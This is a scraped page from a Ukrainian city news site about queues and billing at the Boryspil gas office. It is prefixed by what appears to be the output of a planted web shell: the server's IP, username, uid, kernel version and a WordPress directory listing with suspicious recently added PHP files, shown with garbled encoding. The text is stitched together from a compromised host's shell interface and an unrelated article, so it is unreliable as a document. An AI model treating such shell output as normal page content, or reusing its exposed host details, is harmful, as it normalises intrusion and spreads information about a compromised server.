195.16.88.9 - Linux - whoami(krist287) - uid(1574) gid(1676)
kaylin

·

ϴΪ
ϼĿ¼ʱ޸ʱ
_.well-knownɾ 07552022-07-26 20:57:462022-04-19 08:48:45-
_ldɾ 07552022-07-26 20:55:402022-04-18 21:30:13-
_puɾ 07552022-08-12 22:04:542022-08-12 22:04:54-
doskaɾ 07552022-07-26 20:57:462022-05-13 00:21:36-
gboɾ 07552022-07-26 20:55:422022-04-21 16:29:19-
katalogɾ 07552022-07-26 20:55:422022-05-13 00:20:58-
nailɾ 07552022-07-26 20:55:502022-06-17 13:21:44-
testɾ 07552022-07-26 20:55:422022-04-18 15:34:19-
wakenɾ 07552022-08-11 02:53:342022-08-11 02:53:34-
wp-adminɾ 07552022-08-11 06:04:242022-08-11 06:04:24-
wp-contentɾ 07552022-08-14 09:42:372022-08-14 09:42:37-
wp-includesɾ 07552022-07-26 20:55:502022-04-18 17:42:24-
.htaccess 04442022-08-11 06:04:352022-08-11 06:04:3521.22 K
Damiendep 06442022-08-11 03:43:202022-08-11 03:43:209.20 K
backup.php 06442022-08-13 13:42:572022-08-13 13:42:57772 B
fibber.php 06442022-08-11 01:48:402022-08-11 01:48:4016.68 K
google5f28cd50ed83a936.html 06442022-07-26 20:55:422022-04-24 10:15:3853 B
index.php 04442022-08-14 09:42:532022-04-18 20:09:526.33 K
license.txt 06442022-07-26 20:57:462022-04-18 20:09:5219.45 K
readme.html 06442022-07-26 20:55:502022-04-18 20:10:487.26 K
robots.txt 06442022-08-11 03:34:222022-08-11 03:34:22193 B
tmp.php 06442022-08-13 13:44:442022-08-13 13:44:44761 B
wp-activate.php 06442022-08-14 07:55:592022-04-18 20:09:527.00 K
wp-blog-header.php 06442022-08-14 07:56:052022-04-18 20:09:52351 B
wp-comments-post.php 06442022-07-26 20:55:502022-04-18 20:10:362.28 K
wp-config-sample.php 06442022-07-26 20:55:392022-04-18 20:10:482.93 K
wp-config.php 06442022-08-14 03:19:342022-04-18 20:09:523.69 K
wp-cron.php 06442022-08-14 09:42:362022-04-18 20:09:523.85 K
wp-links-opml.php 06442022-08-14 01:23:122022-04-18 20:09:522.44 K
wp-load.php 06442022-08-14 01:22:322022-04-18 20:09:523.81 K
wp-login.php 06442022-08-14 09:36:452022-04-18 20:09:5246.79 K
wp-mail.php 06442022-08-14 01:22:402022-04-18 20:09:528.38 K
wp-settings.php 06442022-07-26 20:55:502022-04-18 20:10:3622.49 K
wp-signup.php 06442022-08-14 01:22:492022-04-18 20:09:5231.21 K
wp-trackback.php 06442022-08-14 01:23:042022-04-18 20:09:524.64 K
wp.php 06442022-08-11 01:49:212022-08-11 01:49:21453 B
xmlrpc.php 06442022-08-14 09:37:132022-04-18 20:09:523.16 K
Ŀ¼[12] - ļ[25] - [0755]
Linux sr47.hostlife.net 3.10.0-962.3.2.lve1.5.49.el6h.x86_64 #1 SMP Thu Mar 4 07:40:03 EST 2021 x86_64
Apache/2
Працівники газконтори ідуть назустріч споживачеві – Це Бориспіль – сайт міста Бориспіль
loader image
- Юна Українка подарувала Бориспільським кінологам «крилату конячку» яка виконує бажання. Днями, співробітники Кінологічного центру поліції Борисполя, які разом із ЗСУ та ТРО боронять рубежі Броварів, отримали цінний подарунок. Про це повідомляє прес-служба Кінологічного центру поліції в Київській області. Для наших відважних воїнів юна українка намалювала ліс, мирне небо та крилату конячку. За словами художниці, лоша здатне виконувати бажання. Варто лише доторкнутися до нього та подумати про те, чого хочеться найбільше. Картину юної мисткині передали на місце дислокації оборонців Берегині-волонтерки, які вже тривалий час докладають надлюдських зусиль аби забезпечувати воїнів усім необхідним. За бажанням авторки витвір потрапив саме до поліцейських кінологів. -
Меню Закрити

Працівники газконтори ідуть назустріч споживачеві

/ 5. оценок:

Оценок пока нет. Поставьте оценку первым.

Працівники газконтори ідуть назустріч споживачеві

Зранку у приймальні дні до розрахункового відділу Бориспільської філії експлуатації газового господарства (ФЕГГ) стоїть довга черга. Хтось терпляче чекає, а інший обурюється з приводу цін на газ, щодо неточних показників у рахунках, зазначає, що дві години чекає, щоб замінити стару книжку…
Аби з’ясувати причини черг, знайти відповіді на основні питання, які турбують споживачів газу, ми звернулися до начальника ФЕГГ Володимира Миколайовича Хворостянка.
— Сьогодні досить часто ми говоримо про великі черги до закладів обслуговування людей у Бориспільському районі. Це насамперед стосується тих організацій, які мають один приймальний день на тиждень. Володимире Миколайовичу, як вирішити питання з чергами до газконтори? Адже у Вас розрахунковий відділ приймає декілька днів на тиждень.
— Звичайно, проблеми є. Адже зараз ми обслуговуємо 47 тисяч абонентів! Та, найперше, черги створюють самі споживачі. Бо коли б частина із них приходила у другій половині дня, то черги б значно зменшилися. От прийдіть, шановні, десь о 15 годині, у цей час, здебільшого, майже нікого немає. Окрім того, ми розширюємо розрахунковий відділ для того, щоб обслуговувати більшу кількість людей одночасно. Незабаром додатково буде працювати ще 4 спеціалісти.
— Мешканці району розраховуються за квитанціями і за розрахунковими книжками. Який вид розрахунку себе виправдовує?
— Частину абонентів перевели на розрахунки по квитанціях. Але кожен вид розрахунку має свої переваги і недоліки. Квитанції дисциплінують людей, ніби нагадують про необхідність сплатити за газ. Та щомісяця їх потрібно комусь розносити. Є споживачі, яким більше до вподоби книжки. Проте людина може роками сплачувати по книжці і не приходити звіряти показники лічильника до газконтори. Це ж потрібно робити не менше, ніж двічі на рік. Адже можуть змінюватися ціни на спожитий газ, можуть бути збої у комп’ютері.
— Існують випадки, коли людям, які регулярно сплачували за газ, приходять рахунки у декілька тисяч боргу. Чому?
— Справа в тому, що існує декілька категорій, згідно з якими споживачі сплачують за спожитий газ. Наприклад, якщо людина платила по 47,8 коп. за куб газу, тобто споживала газу не більше 6000 кубів за місяць, а потім витрати збільшилися і перевищили 6 тисяч, то робиться перерахунок за попередні шість місяців за вартістю 98 коп. за куб. І надалі нараховується за вищою ціною. У випадку зменшення кількості спожитого газу ми робимо перерахунок і надлишкові кошти будуть використані у подальшому за спожитий газ. Тобто відбувається зміна категорій. Нові диференційовані ціни ввели із січня 2007 року. Тому для цього споживачі і повинні приходити до нас, щоб звірити свої показники. Це передбачено і в договорах, які ми укладали зі споживачами. Незабаром ми введемо додатковий телефон, і люди зможуть повідомляти нам свої показники, не чекаючи у черзі.
— Споживачі газу, у яких відсутній лічильник, скаржаться, що сплачують значно більше, ніж ті, хто платить по лічильнику…
— Згідно з Указом Президента від 27 грудня 2005 р. №1863, Постановою Кабміну від 14 квітня 2004 р. №476 та «Програмою оснащення лічильниками газу житлового фонду Київської області» Бориспільська ФЕГГ безкоштовно, за рахунок НАК «Нафтогаз Україна», встановлює лічильники газу та замінює застарілі роторні лічильники, що вилучені з Державного реєстру, на сучасні. Це значно зекономить сімейний бюджет та час, дозволить сплачувати не за нормативні, а за фактичні обсяги використаного газу.
— Деякі споживачі нарікають на завищені показники лічильників, які вказані у квитанції про оплату.
— Найперше таке трапляється, коли контролер не може потрапити до будинку, тому це нарахування здійснюються внаслідок розрахунків за попередні місяці. Тож споживач відвідавши газконтору, може вирішити усі ці питання.
Як повідомив Володимир Миколайович, борги від населення складають близько 4 млн. грн.
Щоб зекономити час громадян, у Бориспільській ФЕГГ пішли назустріч споживачам і відкрили касу, де не тільки можна сплатити за послуги, що надаються підприємством, але й оплатити усі інші платежі

Переглядів:: 6
Share on facebook
Share on telegram
Share on twitter
guest
0 коментарiв
Межтекстовые Отзывы
Посмотреть все комментарии
Авторизація
*
*
Генерація паролю
0
Оставьте комментарий! Напишите, что думаете по поводу статьи.x
()
x